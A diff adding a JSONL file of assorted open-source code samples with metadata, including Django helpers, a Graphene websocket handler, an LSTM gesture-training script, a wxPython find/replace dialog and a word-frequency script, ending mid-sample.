diff --git "a/1305.jsonl" "b/1305.jsonl" new file mode 100644--- /dev/null +++ "b/1305.jsonl" @@ -0,0 +1,397 @@ +{"seq_id": "41182765", "text": "from django.urls import reverse\nfrom mezzanine.conf import settings\nfrom mezzanine.core.request import current_request\nfrom mezzanine.utils.email import send_mail_template\n\n\ndef send_unavailable_email(variation, quantity=None, to_addr=None, bcc_addresses=None):\n if to_addr is None:\n to_addr = \"Undisclosed Recipients <{}>\".format(settings.DEFAULT_FROM_EMAIL),\n\n context = {\n 'cart_url': current_request().build_absolute_uri(reverse(\"shop_cart\")),\n 'variation': variation,\n 'quantity': quantity\n }\n send_mail_template(\n \"[{}] Weekly Order Item Unavailable\".format(settings.SITE_TITLE),\n \"ffcsa_core/send_unavailable_email\",\n settings.DEFAULT_FROM_EMAIL,\n to_addr,\n context=context,\n fail_silently=False,\n addr_bcc=bcc_addresses\n )\n", "sub_path": "ffcsa/core/availability.py", "file_name": "availability.py", "file_ext": "py", "file_size_in_byte": 823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "mezzanine.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 9, "usage_type": "attribute"}, {"api_name": "mezzanine.conf.settings", "line_number": 9, "usage_type": "name"}, {"api_name": "mezzanine.core.request.current_request", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 12, "usage_type": "call"}, {"api_name": "mezzanine.utils.email.send_mail_template", "line_number": 16, "usage_type": "call"}, {"api_name": "mezzanine.conf.settings.SITE_TITLE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "mezzanine.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "mezzanine.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mezzanine.conf.settings", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "458446750", "text": "from django.core.management.base import BaseCommand, CommandError\nfrom news.models import Post, Category\n\nclass Command(BaseCommand):\n help = 'Подсказка вашей команды' # показывает подсказку при вводе \"python manage.py <ваша команда> --help\"\n requires_migrations_checks = True # напоминать ли о миграциях. Если тру — то будет напоминание о том, что не сделаны все миграции (если такие есть)\n\n def add_arguments(self, parser):\n parser.add_argument('category', type=str)\n\n def handle(self, *args, **options):\n answer = input(f'Вы правда хотите удалить все статьи в категории {options[\"category\"]}? yes/no: ')\n\n if answer != 'yes':\n self.stdout.write(self.style.ERROR('Отменено'))\n\n try:\n category = Category.objects.get(name=options['category'])\n Post.objects.filter(categories__name=category.name).delete()\n self.stdout.write(self.style.SUCCESS(\n f'Succesfully deleted all news from category {category.name}')) # в случае неправильного подтверждения, говорим что в доступе отказано\n except Post.DoesNotExist:\n self.stdout.write(self.style.ERROR(f'Could not find category {options[\"category\"]}'))", "sub_path": "news_portal/NewsPaper/news/management/commands/mycommand.py", "file_name": "mycommand.py", "file_ext": "py", "file_size_in_byte": 1469, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 4, "usage_type": "name"}, {"api_name": "news.models.Category.objects.get", "line_number": 18, "usage_type": "call"}, {"api_name": "news.models.Category.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "news.models.Category", "line_number": 18, "usage_type": "name"}, {"api_name": "news.models.Post.objects.filter", "line_number": 19, "usage_type": "call"}, {"api_name": "news.models.Post.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "news.models.Post", "line_number": 19, "usage_type": "name"}, {"api_name": "news.models.Post.DoesNotExist", "line_number": 22, "usage_type": "attribute"}, {"api_name": "news.models.Post", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "105289275", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef update_trace_linear(trace, spike, alpha, decay):\n trace *= decay\n trace += alpha * spike\n return trace\n\n\ndef compute_final_trace(spikes, alpha, decay):\n final = (spikes * decay ** np.arange(spikes.size - 1, -1, -1)) * alpha\n return final.sum()\n\n\nif __name__ == \"__main__\":\n time = 50\n alpha = 0.6\n decay = 0.1\n trace = 0.0\n trace_list = [trace]\n spikes = np.ones(time)\n\n for i in range(spikes.size):\n trace = update_trace_linear(trace, spikes[i], alpha, decay)\n trace_list.append(trace)\n\n print(trace_list[-1], compute_final_trace(spikes, alpha, decay))\n\n plt.plot(range(time + 1), trace_list)\n plt.show()\n", "sub_path": "extra/max_trace.py", "file_name": "max_trace.py", "file_ext": "py", "file_size_in_byte": 722, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.arange", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "648033558", "text": "from django.utils import timezone\nfrom visitors.utils import get_ip\nfrom visitors.models import Visitor\nimport logging\n\nlogging.basicConfig(filename='logging.log',level=logging.INFO)\n\nclass VisitorsMiddleware(object):\n\n def process_request(self, request):\n ip = get_ip(request)\n try:\n visitor = Visitor.objects.get(ip=ip)\n except Visitor.DoesNotExist:\n visitor = Visitor(ip=ip)\n visitor.last_seen = timezone.now()\n visitor.requests += 1\n visitor.save()\n logging.info(' Visitor {0} with ip {1} requested {2} at {3}'.format(visitor.name, ip, request.path, visitor.last_seen))\n return\n", "sub_path": "shop_production_version/shop/visitors/middleware.py", "file_name": "middleware.py", "file_ext": "py", "file_size_in_byte": 663, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 6, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "visitors.utils.get_ip", "line_number": 11, "usage_type": "call"}, {"api_name": "visitors.models.Visitor.objects.get", "line_number": 13, "usage_type": "call"}, {"api_name": "visitors.models.Visitor.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "visitors.models.Visitor", "line_number": 13, "usage_type": "name"}, {"api_name": "visitors.models.Visitor.DoesNotExist", "line_number": 14, "usage_type": "attribute"}, {"api_name": "visitors.models.Visitor", "line_number": 14, "usage_type": "name"}, {"api_name": "visitors.models.Visitor", "line_number": 15, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 16, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 16, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "371317921", "text": "from typing import List\n\nclass Solution:\n def findLucky(self, arr: List[int]) -> int:\n from collections import Counter\n c = dict(Counter(arr))\n\n result = -1\n\n for key, value in c.items():\n if key == value:\n result = max(result, key)\n\n return result\n\n\n", "sub_path": "LeetCode/findLucky.py", "file_name": "findLucky.py", "file_ext": "py", "file_size_in_byte": 315, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "219737868", "text": "\"\"\"Graphene support\"\"\"\n\nfrom typing import Any, Dict, Optional\n\nfrom baretypes import Info, WebSocket\nimport graphene\nimport graphql\nfrom graphql.subscription.map_async_iterator import MapAsyncIterator\n\nfrom ..websocket_instance import GraphQLWebSocketHandlerInstanceBase\n\n\nclass GrapheneWebSocketHandlerInstance(GraphQLWebSocketHandlerInstanceBase):\n \"\"\"A GraphQL WebSocket handler instance\"\"\"\n\n def __init__(self, schema: graphene.Schema, web_socket: WebSocket, info: Info) -> None:\n super().__init__(web_socket, info)\n self.schema = schema\n\n async def subscribe(\n self,\n query: str,\n variables: Optional[Dict[str, Any]],\n operation_name: Optional[str]\n ) -> MapAsyncIterator:\n return await self.schema.subscribe(\n query,\n variable_values=variables,\n operation_name=operation_name,\n context_value=self.info\n )\n\n async def query(\n self,\n query: str,\n variables: Optional[Dict[str, Any]],\n operation_name: Optional[str]\n ) -> graphql.ExecutionResult:\n return await self.schema.execute_async(\n source=query,\n variable_values=variables,\n operation_name=operation_name,\n context_value=self.info\n )\n", "sub_path": "bareasgi_graphql_next/graphene/websocket_instance.py", "file_name": "websocket_instance.py", "file_ext": "py", "file_size_in_byte": 1331, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "websocket_instance.GraphQLWebSocketHandlerInstanceBase", "line_number": 13, "usage_type": "name"}, {"api_name": "graphene.Schema", "line_number": 16, "usage_type": "attribute"}, {"api_name": "baretypes.WebSocket", "line_number": 16, "usage_type": "name"}, {"api_name": "baretypes.Info", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 24, "usage_type": "name"}, {"api_name": "graphql.subscription.map_async_iterator.MapAsyncIterator", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 37, "usage_type": "name"}, {"api_name": "graphql.ExecutionResult", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "532794709", "text": "import re\nfrom setuptools import setup, find_packages\nimport os\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(here, \"requirements.txt\")) as f:\n required = f.read().splitlines()\n\nversion_file = os.path.join(here, \"mond_project\", \"_version.py\")\nverstrline = open(version_file, \"rt\").read()\nVSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\nmo = re.search(VSRE, verstrline, re.M)\nif mo:\n this_version = mo.group(1)\n print(\"mond_project version = \", this_version)\nelse:\n raise RuntimeError(\"Unable to find version string in %s\" %(version_file))\n\nsetup(\n name=\"mond_project\",\n version=this_version,\n description=\"Code for final project on MOND vs LCDM\",\n url=\"https://github.com/wagoner47/mond_project/tree/master\",\n packages=find_packages(exclude=[\"tests\", \"docs\"]),\n install_requires=required)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 870, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 14, "usage_type": "call"}, {"api_name": "re.M", "line_number": 14, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 21, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "639512283", "text": "import numpy as np\nimport os\nfrom tensorflow.keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\nfrom tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\n\n\nfrom sklearn.metrics import multilabel_confusion_matrix\nfrom tensorflow.keras.models import load_model\n\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nos.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\n\nactions = [\n 'help_gesture_1',\n 'trash1',\n 'trash2'\n]\n\ndata = np.concatenate([\n np.load('dataset/seq_help_gesture_1636731666.npy'),\n np.load('dataset/seq_trash1_1636731666.npy'),\n np.load('dataset/seq_trash2_1636731666.npy')\n], axis=0)\n\ndata.shape\n\nx_data = data[:, :, :-1]\nlabels = data[:, 0, -1]\n\nprint(x_data.shape)\nprint(labels.shape)\n\ny_data = to_categorical(labels, num_classes=len(actions))\ny_data.shape\n\nx_data = x_data.astype(np.float32)\ny_data = y_data.astype(np.float32)\n\nx_train, x_val, y_train, y_val = train_test_split(x_data, y_data, test_size=0.1, random_state=2021)\n\nprint(x_train.shape, y_train.shape)\nprint(x_val.shape, y_val.shape)\n\n\nmodel = Sequential([\n LSTM(64, activation='relu', input_shape=x_train.shape[1:3]),\n Dense(32, activation='relu'),\n Dense(len(actions), activation='softmax')\n])\n\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])\nmodel.summary()\n\n\nhistory = model.fit(\n x_train,\n y_train,\n validation_data=(x_val, y_val),\n epochs=200,\n callbacks=[\n ModelCheckpoint('models/model.h5', monitor='val_acc', verbose=1, save_best_only=True, mode='auto'),\n ReduceLROnPlateau(monitor='val_acc', factor=0.5, patience=50, verbose=1, mode='auto')\n ]\n)\n\n\n\n\n\nmodel = load_model('models/model.h5')\n\ny_pred = model.predict(x_val)\n\nmultilabel_confusion_matrix(np.argmax(y_val, axis=1), np.argmax(y_pred, axis=1))", "sub_path": "proj/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1921, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ReduceLROnPlateau", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 74, "usage_type": "call"}, {"api_name": "sklearn.metrics.multilabel_confusion_matrix", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "519088694", "text": "from django.db import migrations\n\nfrom corehq.util.django_migrations import run_once_off_migration\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0002_domainrequest'),\n ]\n\n operations = [\n run_once_off_migration(\n 'migrate_roles_permissions_feb2019', required_commit='8e8243bc80964e6981fcb89a712776e9faf97397'\n )\n ]\n", "sub_path": "corehq/apps/users/migrations/0003_roles_permissions_update.py", "file_name": "0003_roles_permissions_update.py", "file_ext": "py", "file_size_in_byte": 385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 6, "usage_type": "name"}, {"api_name": "corehq.util.django_migrations.run_once_off_migration", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "354555234", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 27 23:12:18 2019\n\n@author: Guilherme\n\"\"\"\nimport itertools\nimport numpy as np\nimport copy\nfrom Processor import Processor\n\nclass CrossProcessor:\n \n def __init__(self, training, testing, target_var, random_state, verbose):\n \n self.training = training\n self.testing = testing\n self.target_var = target_var\n self.random_state = random_state\n self.verbose = verbose\n self.stages = []\n self.ite_c = 0\n \n def addStage(self, stage):\n self.stages.append(stage)\n \n def addStages(self, stages):\n self.stages = stages\n \n def mixer(self):\n combinations = []\n for stage in self.stages:\n combinations.append(np.arange(len(stage.functions)))\n \n self.combinations = list(itertools.product(*combinations))\n \n def process(self):\n processor = Processor(self.training, self.testing, self.target_var, self.random_state)\n processor.addStages(copy.deepcopy(self.stages), self.combinations[self.ite_c])\n processor.exec_()\n self.ite_c += 1\n return processor\n #Missing Values Treatment\n # Drop missing values/ Impute missing values\n \n #Outlier Detection\n # Zscore/Mahalanobis\n \n #Outlier Treatment\n # Smoothing/Removal\n \n #Feature Selection\n # RFE/PCA", "sub_path": "CrossProcessor.py", "file_name": "CrossProcessor.py", "file_ext": "py", "file_size_in_byte": 1398, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.arange", "line_number": 33, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 35, "usage_type": "call"}, {"api_name": "Processor.Processor", "line_number": 38, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "86963801", "text": "#---------------------------------------------------------------------\n# findreplacedialog.py\n#\n# Author: Jason Gedge\n#\n# InfO: The wax FindReplaceDialog now has pre-programmed\n# find/replace functionality to make everyone's life\n# easier. These are the functions that are required\n# to be in the control that you pass to FindReplaceDialog:\n# => GetValue;\n# Return the string of text in the control\n# => [Get/Set]Selection;\n# Get/set the selected text (or position of insertion)\n# => Replace;\n# Replace a certain block of text in the control\n# => GetStringSelection;\n# ...\n#\n# TODO:\n# -\n#---------------------------------------------------------------------\n\nfrom messagedialog import MessageDialog\nimport string\nimport os\nimport wx\nimport waxobject\n\nSPECIAL_ATTRS = ['GetValue', 'Replace', 'SetSelection', 'GetSelection',\n 'GetStringSelection']\n\nclass FindReplaceDialog(wx.FindReplaceDialog, waxobject.WaxObject):\n \"\"\" A Find/Replace dialog with pre-programmed find/replace functionality. \"\"\"\n\n __events__ = {\n 'Find': wx.EVT_COMMAND_FIND,\n 'FindNext': wx.EVT_COMMAND_FIND_NEXT,\n 'FindReplace': wx.EVT_COMMAND_FIND_REPLACE,\n 'FindReplaceAll': wx.EVT_COMMAND_FIND_REPLACE_ALL,\n 'FindClose': wx.EVT_COMMAND_FIND_CLOSE,\n }\n\n def __init__(self, parent, control=None, title=\"\", replace=0):\n style = 0\n if replace:\n style = wx.FR_REPLACEDIALOG\n\n self.data = wx.FindReplaceData()\n self.data.SetFlags(wx.FR_DOWN) # search down by default\n wx.FindReplaceDialog.__init__(self, parent, self.data, title, style)\n\n self.parent = parent\n self.control = control\n self.nl_error_fix = False\n if isinstance(self.control, wx.TextCtrl):\n self.nl_error_fix = True\n\t\n for attrname in SPECIAL_ATTRS:\n setattr(self, 'f'+attrname, None)\n\n if control:\n for attrname in SPECIAL_ATTRS:\n f = getattr(control, attrname, None)\n setattr(self, 'f'+attrname, f)\n\n # Depending on what functions we got, we can handle certain events\n # so this is where check and set the events appropriately\n if self.fGetSelection and self.fSetSelection and self.fGetValue:\n if self.fGetStringSelection and self.fReplace:\n self.OnFindReplace = self._OnFindReplace\n self.OnFindReplaceAll = self._OnFindReplaceAll\n\n self.OnFind = self._OnFind\n self.OnFindNext = self._OnFindNext\n\n self.BindEvents()\n\n #\n # This will return a tuple (start, end) specifying the start position\n # and the end position of the string, or (-1, -1) if not found\n #\n def DoFind(self, what):\n flags = self.data.GetFlags()\n\n cs = 0\n if (flags & wx.FR_MATCHCASE) == wx.FR_MATCHCASE:\n cs = 1\n dir = -1\n if (flags & wx.FR_DOWN) == wx.FR_DOWN:\n dir = 1\n whole_word = 0\n if (flags & wx.FR_WHOLEWORD) == wx.FR_WHOLEWORD:\n whole_word = 1\n\n # Depending on direction, start/end points differ\n if dir == -1:\n start = self.fGetSelection()[0] - 1\n end = -1\n else:\n start = self.fGetSelection()[1]\n end = -2\n\n res = string_find( self.fGetValue(), what, start, end,\n dir=dir, case_sensitive=cs, whole_word=whole_word,\n\t\t\t nl_error_fix=self.nl_error_fix)\n\n return (res, res + len(what))\n\n #\n # The next four are the pre-programmed find/replace events\n #\n def _OnFind(self, event):\n start, end = self.DoFind(event.GetFindString())\n if start == -1:\n msg = MessageDialog(self, 'Find/Replace',\n 'Cannot find \"' + event.GetFindString() + '\"',\n icon='information')\n msg.ShowModal()\n else:\n self.fSetSelection(start, end)\n\n def _OnFindNext(self, event):\n self._OnFind(event)\n\n def _OnFindReplace(self, event):\n if event.GetFindString() == '':\n return\n\n if self.fGetStringSelection() == event.GetFindString():\n start, end = self.fGetSelection()\n pos = start + len(event.GetReplaceString())\n self.fReplace(start, end, event.GetReplaceString())\n self.fSetSelection(pos, pos)\n\n self.OnFind(event)\n\n def _OnFindReplaceAll(self, event):\n if event.GetFindString() == '':\n return\n\n self.fSetSelection(0, 0)\n start, end = self.DoFind(event.GetFindString())\n while start != -1:\n pos = start + len(event.GetReplaceString())\n self.fReplace(start, end, event.GetReplaceString())\n self.fSetSelection(pos, pos)\n start, end = self.DoFind(event.GetFindString())\n\n #\n # The next two are kind of like a hack to prevent opening the same\n # FindReplaceDialog twice for the one parent (which shuts down\n # everything if it does happen)\n #\n def OnFindClose(self, event=None):\n del self.parent._fr_opened\n self.Destroy()\n\n def Show(self):\n try:\n tval = self.parent._fr_opened\n except AttributeError:\n self.parent._fr_opened = 5\n wx.FindReplaceDialog.Show(self)\n\n def ShowModal(self):\n result = self.ShowModal()\n if result == wx.ID_OK:\n return 'ok'\n else:\n return 'cancel'\n\n#\n# auxiliary functions\n\n#\n# Checks to see if the match is a whole word\n#\n_alphanum = string.ascii_letters + string.digits\n\ndef is_whole_word(str, what, start):\n end = start + len(what) - 1\n if (start == 0 or not str[start - 1] in _alphanum) and \\\n (end == len(str) - 1 or not str[end + 1] in _alphanum):\n return True\n return False\n\n#\n# Needed because of different EOLs used by operating systems in TextBox\n#\ndef newline_error_fix(str):\n if os.name == 'nt':\t\t# change for overall windows\n return str.replace('\\n', '\\r\\n')\n else:\n return str\n\n#\n# Character case checking\n#\ndef chr_is_equal(c1, c2, case_sensitive):\n if case_sensitive:\n return c1 == c2\n else:\n return c1.lower() == c2.lower()\n\n#\n# string_find - I think the name speaks for itself\n# str: the string to search through\n# what: what you're looking for\n# start: the starting point of the search\n# end: the end point of the search\n# dir: 1 for downwards, -1 for upwards\n#\n# Sloppy, but it works. I should clean this up later\n#\ndef string_find(str, what, start, end, dir=1, case_sensitive=0, whole_word=0, nl_error_fix=1):\n \"\"\"similar to string.find, except there are more options available\"\"\"\n\n if nl_error_fix:\n str = newline_error_fix(str)\n\n partial_match = False # Set to true when a partioal match is started\n start_char = 0 # start point of 'what' string\n end_char = len(what) - 1 # end point\n # Direction is upwards, so swap start/end points\n if dir == -1:\n start_char, end_char = end_char, start_char\n curr_char = start_char # where we are in the 'what' string\n # Yet another fix for windows. If -2 is passed, we go right to the end\n if end == -2:\n end = len(str)\n # An iterator to go over the search string\n xiter = xrange(start, end, dir).__iter__()\n y = 0\n # If case sensitive, lowercase everything\n if case_sensitive == 0:\n what = what.lower()\n\n try:\n # StopIteration exception should break this loop\n while True:\n # Get the next position in the search string\n x = xiter.next()\n # Get current character (lowercase if case sensitive)\n char_check = str[x]\n # If that char is same as the char were looking at\n if chr_is_equal(char_check, what[curr_char], case_sensitive):\n # If we're at the end of the 'what' string\n if curr_char == end_char:\n # One must also include the # of newlines :/\n pos = x - curr_char\n # Check for whole word match if required\n if whole_word == 1:\n if is_whole_word(str, what, pos):\n return pos# + newline_error_fix(str, x)\n else: # not a whole word, start again\n curr_char = start_char\n if partial_match and chr_is_equal(char_check, what[curr_char], case_sensitive):\n xiter = xrange(x, end, dir).__iter__()\n else:\n return pos# + newline_error_fix(str, x)\n else:\n # Not at the end, go to the next character\n curr_char += dir\n partial_match = True\n else:\n # Not the same char, let's revert back\n curr_char = start_char\n if partial_match and chr_is_equal(char_check, what[curr_char], case_sensitive):\n xiter = xrange(x, end, dir).__iter__()\n except StopIteration:\n pass\n # Never found it\n return -1\n\n", "sub_path": "EasyPython/wax/findreplacedialog.py", "file_name": "findreplacedialog.py", "file_ext": "py", "file_size_in_byte": 9383, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "wx.FindReplaceDialog", "line_number": 32, "usage_type": "attribute"}, {"api_name": "waxobject.WaxObject", "line_number": 32, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND", "line_number": 36, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND_NEXT", "line_number": 37, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND_REPLACE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND_REPLACE_ALL", "line_number": 39, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND_CLOSE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "wx.FR_REPLACEDIALOG", "line_number": 46, "usage_type": "attribute"}, {"api_name": "wx.FindReplaceData", "line_number": 48, "usage_type": "call"}, {"api_name": "wx.FR_DOWN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.FindReplaceDialog.__init__", "line_number": 50, "usage_type": "call"}, {"api_name": "wx.FindReplaceDialog", "line_number": 50, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 55, "usage_type": "attribute"}, {"api_name": "wx.FR_MATCHCASE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "wx.FR_DOWN", "line_number": 89, "usage_type": "attribute"}, {"api_name": "wx.FR_WHOLEWORD", "line_number": 92, "usage_type": "attribute"}, {"api_name": "messagedialog.MessageDialog", "line_number": 115, "usage_type": "call"}, {"api_name": "wx.FindReplaceDialog.Show", "line_number": 163, "usage_type": "call"}, {"api_name": "wx.FindReplaceDialog", "line_number": 163, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 167, "usage_type": "attribute"}, {"api_name": "string.ascii_letters", "line_number": 178, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.name", "line_number": 191, "usage_type": "attribute"}]} +{"seq_id": "208388173", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 6 17:34:52 2020\n\n@author: lenovo\n\"\"\"\nimport operator\nimport nltk\nimport re\n\nstop_words_file='stop_words.txt'\n#with open(english,'r',encoding='utf-8') as file:\n# u=file.read()\n\nlist_word_result=[]\n#for i in range(1,4):\n# english='body'+str(i)+'.txt'\n# f1=open(english,'r',encoding='utf-8')\n# u=f1.readline()\n# while u!='' :\n# string=re.sub('[^\\w ]','',u)\n# string=string.lower()#小写\n# list_word_result.append(nltk.word_tokenize(string))\n# u=f1.readline()\n# #print(nltk.pos_tag(nltk.word_tokenize(str))) #对分完词的结果进行词性标注\n# f1.close()\n\nf1=open('all_review.txt','r',encoding='utf-8')\nu=f1.readline()\nwhile u!='' :\n string=re.sub('[^\\w ]','',u)\n string=string.lower()#小写\n list_word_result.append(nltk.word_tokenize(string))\n u=f1.readline()\n#print(nltk.pos_tag(nltk.word_tokenize(str))) #对分完词的结果进行词性标注\nf1.close()\n\n#停用词添加\n#stop_words=[]\n#f2=open(stop_words_file,'r',encoding='utf-8')\n#sr=f2.readline().rstrip(\"\\n\")\n#while sr!='' :\n# stop_words.append(sr)\n# sr=f2.readline().rstrip(\"\\n\")\n#f2.close()\n\n\n# 利用字典进行处理\ndic = {}\nfor wordlist in list_word_result:\n for word in wordlist:\n# if word in stop_words:#停止词则跳过\n# continue\n if word not in dic:\n dic[word] = 1\n else:\n dic[word] = dic[word] + 1\nswd=sorted(dic.items(), key=operator.itemgetter(1),reverse=True)#排序\n#输出前100个频数单词\ncount=0\nfor sw in swd:\n print(sw)\n count+=1\n if count>=100:\n break\n#\n##将有的词写成文档\n#f3=open('words.txt','w',encoding='utf-8')\n#for word in dic.keys():\n# f3.writelines(word+'\\n')\n#f3.close()\n#\n##将有的频数写成文档d\n#f4=open('frequency.txt','w',encoding='utf-8')\n#for frequency in dic.values():\n# f4.writelines(str(frequency)+'\\n')\n#f4.close()\n#\n#将有的频数写成文档\nf5=open('all_items.txt','w',encoding='utf-8')\nfor word,frequency in dic.items():\n f5.writelines(word+','+str(frequency)+'\\n')\nf5.close()\n\n", "sub_path": "python/2020年美赛/test2.py", "file_name": "test2.py", "file_ext": "py", "file_size_in_byte": 2111, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 33, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "400666540", "text": "from pycm.utils.data_structs import stack\n\ndef assert_layer_state(layer, stack=None, prev_layer=None, next_layer=None):\n def test(attr, v):\n if v:\n assert getattr(layer, attr) == v\n else:\n assert getattr(layer, attr) is None\n\n test('stack', stack)\n test('prev_layer', prev_layer)\n test('next_layer', next_layer)\n\n\ndef test_init():\n s = stack.Stack()\n assert s.head is None\n\n\ndef 